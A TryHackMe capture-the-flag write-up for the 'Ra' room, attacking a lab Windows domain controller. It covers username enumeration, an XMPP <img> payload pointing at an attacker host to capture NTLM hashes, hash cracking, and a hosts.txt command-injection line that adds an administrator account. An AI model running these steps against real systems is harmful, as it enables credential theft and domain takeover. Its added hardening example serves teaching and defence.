TryHackMe >> Ra

DESCRIPTION

You have gained access to the internal network of WindCorp, the multibillion-dollar company running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).

The next step would be to take their crown jewels and get full access to their internal network. You have spotted a new Windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?

ENUM >> NMAP

# Nmap 7.92 scan initiated Mon Feb  7 21:34:49 2022 as: nmap -sT -A -p 53,80,88,135,139,389,445,464,593,636,2179,3268,3269,3389,5222,5269,7070,7443,7777,9090,9091 -oN nmap_agressive 10.10.222.51
Nmap scan report for 10.10.222.51
Host is up (0.35s latency).

PORT     STATE SERVICE             VERSION
53/tcp   open  domain              Simple DNS Plus
80/tcp   open  http                Microsoft IIS httpd 10.0
|_http-title: Windcorp.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec        Microsoft Windows Kerberos (server time: 2022-02-07 10:35:45Z)
135/tcp  open  msrpc               Microsoft Windows RPC
139/tcp  open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server       Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2022-02-06T10:28:31
|_Not valid after:  2022-08-08T10:28:31
|_ssl-date: 2022-02-07T10:37:40+00:00; +47s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2022-02-07T10:37:02+00:00
5222/tcp open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     unknown: 
|     compression_methods: 
|     xmpp: 
|       version: 1.0
|     features: 
|     stream_id: alldcg4s1r
|     auth_mechanisms: 
|_    capabilities: 
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
|_ssl-date: 2022-02-07T10:37:41+00:00; +47s from scanner time.
5269/tcp open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     unknown: 
|     compression_methods: 
|     xmpp: 
|     features: 
|     auth_mechanisms: 
|_    capabilities: 
7070/tcp open  http                Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open  ssl/http            Jetty 9.4.18.v20190429
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
7777/tcp open  socks5              (No authentication; connection not allowed by ruleset)
| socks-auth-info: 
|_  No authentication
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 07 Feb 2022 10:35:44 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 07 Feb 2022 10:35:55 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest: 
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open  ssl/xmltec-xmlmail?
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 07 Feb 2022 10:36:10 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 07 Feb 2022 10:36:12 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 400 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
Network Distance: 2 hops
Service Info: Host: FIRE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 46s, deviation: 0s, median: 46s
| smb2-time: 
|   date: 2022-02-07T10:37:06
|_  start_date: N/A

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   361.67 ms 10.9.0.1
2   361.81 ms 10.10.222.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb  7 21:37:11 2022 -- 1 IP address (1 host up) scanned in 142.20 seconds
  • Kerberos on port 88 plus LDAP on 389/3268 mean we are dealing with a domain controller for windcorp.thm, and the RDP certificate names it Fire.windcorp.thm. Add both fire.windcorp.thm and windcorp.thm (pointing at the target IP) to /etc/hosts before going further: Kerberos, LDAP and the XMPP client all need the names to resolve.

ENUM >> Userlist found in website HTML code…

  • The website has a list of their "IT support-staff", and they are all XMPP links…

organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
tinygoose102
brownostrich284
sadswan869
goldencat416
whiteleopard529
happymeercat399
orangegorilla428

ENUM >> Kerbrute against harvested userlist

❯ ./kerbrute userenum --dc windcorp.thm -d windcorp.thm userlist

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 02/08/22 - Ronnie Flathers @ropnop

2022/02/08 01:45:11 >  Using KDC(s):
2022/02/08 01:45:11 >   windcorp.thm:88

2022/02/08 01:45:11 >  [+] VALID USERNAME:       tinygoose102@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       brownostrich284@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       Edward@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       Edeltraut@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       organicfish718@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       Emile@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       angrybird253@windcorp.thm
2022/02/08 01:45:11 >  [+] VALID USERNAME:       buse@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       goldencat416@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       happymeercat399@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       orangegorilla428@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       whiteleopard529@windcorp.thm
2022/02/08 01:45:12 >  [+] VALID USERNAME:       sadswan869@windcorp.thm
2022/02/08 01:45:12 >  Done! Tested 15 usernames (13 valid) in 0.758 seconds
  • These usernames are all well and good… but without any passwords they don't hold much value. A validated username list is normally the input for AS-REP roasting or a cautious password spray; here, though, the website offers a shorter route, so we need a different way in!

ENUM >> Some more users!

Turning back to the website, the only other interactive item on the front page is the Reset Password button at the top right, so the next step was to look for something we could feed it.

Closer inspection of the "Employees in focus" area makes it obvious that "Lily Levesque" has a favourite pet: the dog in her picture. But what about the dog's name? The filename of that image in the page source gives us a big clue.

That is all great… but none of our confirmed accounts match her name. Can we guess Lily's?

Looking at the naming of the other two employees listed in this section, we can see a pattern: first name followed by the first two letters of the surname. Just in case, we also throw in the first name on its own as a candidate:
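Generating the candidates programmatically, as an added example that is not part of the original writeup: the function below turns display names into usernames using the pattern observed on the WindCorp site first, then a few other common Active Directory conventions, and writes them to a file for kerbrute. "Lily Levesque" is from the page; "Jane Doe" is a constructed name, and the output filename userlist_guessed.txt is an assumption.

```powershell
# Added example, not from the original writeup: derive username candidates from
# display names. The WindCorp pattern (first name + first two letters of the surname,
# "Lily Levesque" -> "Lilyle") goes first; the rest are other common AD conventions.
# Kerberos user names are case-insensitive, so no case variants are needed.
function Get-UsernameCandidates {
    param([Parameter(Mandatory)] [string[]] $FullNames)

    foreach ($name in $FullNames) {
        $parts = ($name.Trim() -split '\s+')
        if ($parts.Count -lt 2) { continue }      # need at least "First Last"
        $first = $parts[0]
        $last  = $parts[-1]
        $first + $last.Substring(0, [Math]::Min(2, $last.Length))   # Lilyle  (observed pattern)
        $first                                                       # Lily    (first name only)
        $first + '.' + $last                                         # Lily.Levesque
        $first.Substring(0, 1) + $last                               # LLevesque
        $first + $last.Substring(0, 1)                               # LilyL
    }
}

# Constructed input: "Lily Levesque" is from the page, "Jane Doe" is made up.
$names = @('Lily Levesque', 'Jane Doe')
$candidates = Get-UsernameCandidates -FullNames $names | Select-Object -Unique
$candidates | Set-Content -Path .\userlist_guessed.txt -Encoding ascii   # assumed filename
$candidates
# Feed the file to kerbrute exactly as before:
#   ./kerbrute userenum --dc windcorp.thm -d windcorp.thm userlist_guessed.txt
```

The observed pattern is listed first so that, when the domain really does use it, the hit shows up at the top of the kerbrute output; the other conventions cost nothing extra against a KDC, since userenum only sends AS-REQs and does not lock accounts.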

Re-running Kerbrute on the updated list yields us two new results…

2022/02/08 13:28:39 >  [+] VALID USERNAME:       Kirkug@windcorp.thm
2022/02/08 13:28:39 >  [+] VALID USERNAME:       Lilyle@windcorp.thm

Hello there Lilyle! 😉

PRIVESC >> reset lilyle’s password

  • OK, now that we have both Lilyle's username and her dog's name, let's give them a shot in the Reset Password form:

  • Success! We now have Lilyle's password!

ENUM >> SMBMap

  • Let's see whether Lilyle's credentials give us any SMB access:
❯ smbmap -H 10.10.173.233 -u lilyle -p ChangeMe#1234
[+] IP: 10.10.173.233:445       Name: fire.windcorp.thm
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        Shared                                                  READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   READ ONLY

LOOT >> "Flag 1.txt"
❯ smbclient -U lilyle \\\\10.10.173.233\\Shared
Enter WORKGROUP\lilyle's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 30 10:45:42 2020
  ..                                  D        0  Sat May 30 10:45:42 2020
  Flag 1.txt                          A       45  Sat May  2 01:32:36 2020
  spark_2_8_3.deb                     A 29526628  Sat May 30 10:45:01 2020
  spark_2_8_3.dmg                     A 99555201  Sun May  3 21:06:58 2020
  spark_2_8_3.exe                     A 78765568  Sun May  3 21:05:56 2020
  spark_2_8_3.tar.gz                  A 123216290  Sun May  3 21:07:24 2020

                15587583 blocks of size 4096. 10905638 blocks available
smb: \> get "Flag 1.txt"
getting file \Flag 1.txt of size 45 as Flag 1.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit

❯ cat Flag\ 1.txt

ENUM >> Spark 2.8.3

Spark is an XMPP client, linked from the main website at http://fire.windcorp.thm directly below the list of "IT support-staff". On top of that, installers for it sit in the Shared folder that Lilyle can read… this has to be a big hint!

After installing the latest version of Spark (2.9.4 at the time) on my local machine and getting nowhere, I tried the "suggested" version 2.8.3 instead. First things first: a quick Google search turned up the following CVE, which is filed against exactly that version:

https://www.cvedetails.com/cve/CVE-2020-12772/

This pointed to the following reference: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md

  • Quoted in the README.md on GitHub:

    When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image, like this:

    <img src=[external_ip]/test.img>

    Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!

  • … and also:

    By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).

Sounds like a plan! 🙂

  • Oh, and did I forget to mention that theart42, who discovered this CVE, was also one of the creators of this room, and specifically references creating a CTF around this exact vulnerability? 😉 (It probably helps too that all the example images on the GitHub repo were taken directly from this CTF.)

  • First, go into the Advanced menu at the bottom of the login window and ensure that the two highlighted options are ticked (screenshot not preserved):

  • With Lilyle's username and password filled in and the Domain set to windcorp.thm, hit the Login button:

  • Start Responder (e.g. responder -I tun0; its HTTP server, which answers every request with an NTLM challenge, is on by default), then go to Actions -> Start a chat and enter buse as the address (buse always seems to be online):

  • Send a message containing <img src="http://<ATTACK_IP>/picture.jpg"> to buse, then watch Responder. What it captures is a NetNTLMv2 challenge-response, not an NT hash: it cannot be passed-the-hash, and because FIRE requires SMB signing (see the nmap host script results) relaying it to SMB on this host is out as well, so cracking it is the way forward:

[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.173.233
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash     : <REDACTED>

LOOT >> cracking buse's NTLMv2 hash
❯ hashcat -m 5600 buse.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

<REDACTED>:<REDACTED>

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:6da1ec088e2f0ad5:c28f54dab3f6b4c463f...000000
Time.Started.....: Tue Feb  8 16:55:04 2022 (4 secs)
Time.Estimated...: Tue Feb  8 16:55:08 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   951.0 kH/s (3.53ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2961408/14344385 (20.65%)
Rejected.........: 0/2961408 (0.00%)
Restore.Point....: 2957312/14344385 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v10014318 -> utrox11

Started: Tue Feb  8 16:54:41 2022
Stopped: Tue Feb  8 16:55:09 2022

PRIVESC >> Evil-WinRM shell with buse!

❯ evil-winrm -i 10.10.180.148 -u buse -p <REDACTED>

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\buse\Documents> ls
*Evil-WinRM* PS C:\Users\buse\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\buse\Desktop> ls

    Directory: C:\Users\buse\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/7/2020   3:00 AM                Also stuff
d-----         5/7/2020   2:58 AM                Stuff
-a----         5/2/2020  11:53 AM             45 Flag 2.txt
-a----         5/1/2020   8:33 AM             37 Notes.txt

*Evil-WinRM* PS C:\Users\buse\Desktop>

LOOT >> "Flag 2.txt"
*Evil-WinRM* PS C:\Users\buse\Desktop> cat "Flag 2.txt"
<REDACTED>

LOOT >> checkservers.ps1 in C:\scripts
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "brittanycr@windcorp.thm"
# specify where the notifications come from
$notificationfrom = "admin@windcorp.thm"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"

# start looping here
Do{
$available = $Null
$notavailable = $Null
Write-Host (Get-Date)

# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
    $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
    Invoke-Expression $p
if($p)
    {
     # if the Host is available then just write it to the screen
     write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
     [Array]$available += $_
    }
else
    {
     # If the host is unavailable, give a warning to screen
     write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White
     $p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue
     if(!($p))
       {
        # If the host is still unavailable for 4 full pings, write error and send email
        write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White
        [Array]$notavailable += $_

        if ($OutageHosts -ne $Null)
            {
                if (!$OutageHosts.ContainsKey($_))
                {
                 # First time down add to the list and send email
                 Write-Host "$_ Is not in the OutageHosts list, first time down"
                 $OutageHosts.Add($_,(get-date))
                 $Now = Get-date
                 $Body = "$_ has not responded for 5 pings at $Now"
                 Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
                  -Subject "Host $_ is down" -SmtpServer $smtpserver
                }
                else
                {
                    # If the host is in the list do nothing for 1 hour and then remove from the list.
                    Write-Host "$_ Is in the OutageHosts list"
                    if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut)
                    {$OutageHosts.Remove($_)}
                }
            }
        else
            {
                # First time down create the list and send email
                Write-Host "Adding $_ to OutageHosts."
                $OutageHosts = @{$_=(get-date)}
                $Body = "$_ has not responded for 5 pings at $Now"
                Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
                 -Subject "Host $_ is down" -SmtpServer $smtpserver
            }
       }
    }
}
# Report to screen the details
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count
Write-Host "Not available count:"$notavailable.count
Write-Host "Not available hosts:"
$OutageHosts
Write-Host ""
Write-Host "Sleeping $SleepTimeOut seconds"
sleep $SleepTimeOut
if ($OutageHosts.Count -gt $MaxOutageCount)
{
    # If there are more than a certain number of host down in an hour abort the script.
    $Exit = $True
    $body = $OutageHosts | Out-String
    Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
     -Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer
}
}
while ($Exit -ne $True)

PRIVESC >> using checkservers.ps1 to gain Administrator

The PowerShell loot above looks like a massive chunk of script to take in… and it is! The basic idea: every cycle it reads a list of hosts from C:\Users\brittanycr\hosts.txt (external sites such as google.com in this case), pings each one with Test-Connection, and emails brittanycr about any that stop answering.

The part we care about is the very start of the loop (right after the variables):

get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
    $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
    Invoke-Expression $p

Every line of C:\Users\brittanycr\hosts.txt that does not contain a # anywhere (the filter is -match "#", not "starts with #", so a payload must avoid that character entirely) is interpolated into a command string and handed to Invoke-Expression. Because that string is re-parsed as PowerShell code rather than passed as an argument, a line containing ; ends the Test-Connection statement and whatever follows runs as a new statement, with the template's trailing -Count 1 -ea silentlycontinue tacked onto the last one.

We can also tell from log.txt that the script is running continuously, with roughly 45 seconds between runs (the $SleepTimeOut value):

*Evil-WinRM* PS C:\Scripts> cat log.txt
Last run: 02/08/2022 20:06:26
*Evil-WinRM* PS C:\Scripts> cat log.txt
Last run: 02/08/2022 20:07:11

So, with a carefully crafted hosts.txt, checkservers.ps1 will run whatever we put there as the (evidently privileged) account the script is scheduled under…
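To make the mechanism concrete, here is an added example (written for this edit, not code from the room or the writeup) that runs the original checkservers.ps1 line pattern beside a hardened rewrite over the same constructed hosts list. The hostile line uses a harmless Write-Warning in place of the net user payload; the file path under $env:TEMP and the hostname regex are assumptions.

```powershell
# Added example, not from the original writeup or the room: the checkservers.ps1
# pattern beside a hardened rewrite. Both read the same constructed hosts file;
# only the vulnerable one executes the injected statement.

# Constructed hosts.txt: a real host, a comment, and a hostile line. The hostile line
# stands in for ";net user ... /add" but only raises a warning. Its last statement,
# Test-Connection localhost, is there to absorb the "-Count 1 -ea silentlycontinue"
# that the template appends, just as the trailing net command did on FIRE.
$hostsFile = Join-Path $env:TEMP 'hosts_demo.txt'   # assumed location
@(
    'localhost'
    '# maintenance.windcorp.thm'
    "localhost;Write-Warning 'INJECTED: file content ran as code';Test-Connection localhost"
) | Set-Content -Path $hostsFile

function Invoke-CheckVulnerable {
    param([string] $Path)
    # Same shape as the loot: the line is interpolated into a command string and
    # re-parsed by Invoke-Expression, so ';' starts a new statement. Note also that
    # $p holds the command string, never the ping result, so a later if($p) is always true.
    Get-Content $Path | Where-Object { !($_ -match '#') } | ForEach-Object {
        $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
        Invoke-Expression $p
    }
}

function Invoke-CheckHardened {
    param([string] $Path)
    # Assumed allow-list: an RFC 1123 style host name or FQDN, nothing else.
    $hostPattern = '^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
    Get-Content $Path |
        ForEach-Object { ($_ -replace '#.*$', '').Trim() } |   # strip comments, keep the rest
        Where-Object { $_ -ne '' } |
        ForEach-Object {
            if ($_ -notmatch $hostPattern) {
                Write-Warning "Rejected malformed host entry: $_"
                return   # inside ForEach-Object this skips to the next item
            }
            # The value is passed as an argument and is never re-parsed as code.
            $up = [bool](Test-Connection -ComputerName $_ -Count 1 -Quiet -ErrorAction SilentlyContinue)
            [pscustomobject]@{ Host = $_; Reachable = $up }
        }
}

'--- vulnerable: the INJECTED warning appears ---'
Invoke-CheckVulnerable -Path $hostsFile
'--- hardened: the hostile line is rejected, localhost is pinged ---'
Invoke-CheckHardened -Path $hostsFile
```

Run it as an ordinary user in a Windows PowerShell session. The vulnerable path prints the INJECTED warning because file content is re-parsed as code; the hardened path rejects the same line at validation and never hands anything from the file to Invoke-Expression. The fix for the real script is the second function's shape: strip comments, validate against an allow-list, then pass the value as a cmdlet argument.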

  • But we need write access to brittanycr's home directory to plant it…
*Evil-WinRM* PS C:\scripts> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                       Type             SID                                          Attributes
================================================ ================ ============================================ ==================================================
Everyone                                         Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                    Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access       Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                        Alias            S-1-5-32-548                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                     Alias            S-1-5-32-555                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                  Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                             Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                 Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                   Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
WINDCORP\IT                                      Group            S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                 Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level      Label            S-1-16-8448
  • Because we are a member of Account Operators, we can modify ordinary user accounts (anything not in a protected group such as Administrators or Domain Admins), most importantly by resetting their passwords:
*Evil-WinRM* PS C:\scripts> net user brittanycr hax0r3d! /domain
The command completed successfully.
  • Now create a hosts.txt with the following single line (no # anywhere, or the Where-Object filter drops it; the leading ; closes the Test-Connection statement, and the template's trailing -Count 1 -ea silentlycontinue ends up appended to the last net command):
;net user stimpz0r r00t3d! /add;net localgroup Administrators stimpz0r /add
  • Connect to the Users share with brittanycr's new password and upload hosts.txt:
❯ smbclient -U brittanycr \\\\10.10.135.16\\Users
Enter WORKGROUP\brittanycr's password:
Try "help" to get a list of possible commands.
smb: \> cd brittanycr
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \brittanycr\>
  • Then sit back and watch! 😉
*Evil-WinRM* PS C:\scripts> cat log.txt
Last run: 02/08/2022 19:23:11
*Evil-WinRM* PS C:\scripts> Get-LocalUser "stimpz0r"
User stimpz0r was not found.
At line:1 char:1
+ Get-LocalUser "stimpz0r"
+ ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (stimpz0r:String) [Get-LocalUser], UserNotFoundException
    + FullyQualifiedErrorId : UserNotFound,Microsoft.PowerShell.Commands.GetLocalUserCommand
*Evil-WinRM* PS C:\scripts> cat log.txt
Last run: 02/08/2022 19:23:56
*Evil-WinRM* PS C:\scripts> Get-LocalUser "stimpz0r"

Name     Enabled Description
----     ------- -----------
stimpz0r True
  • Finally, lets test out our new access:
❯ evil-winrm -i windcorp.thm -u stimpz0r -p r00t3d!

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\stimpz0r\Documents> whoami
windcorp\stimpz0r
*Evil-WinRM* PS C:\Users\stimpz0r\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
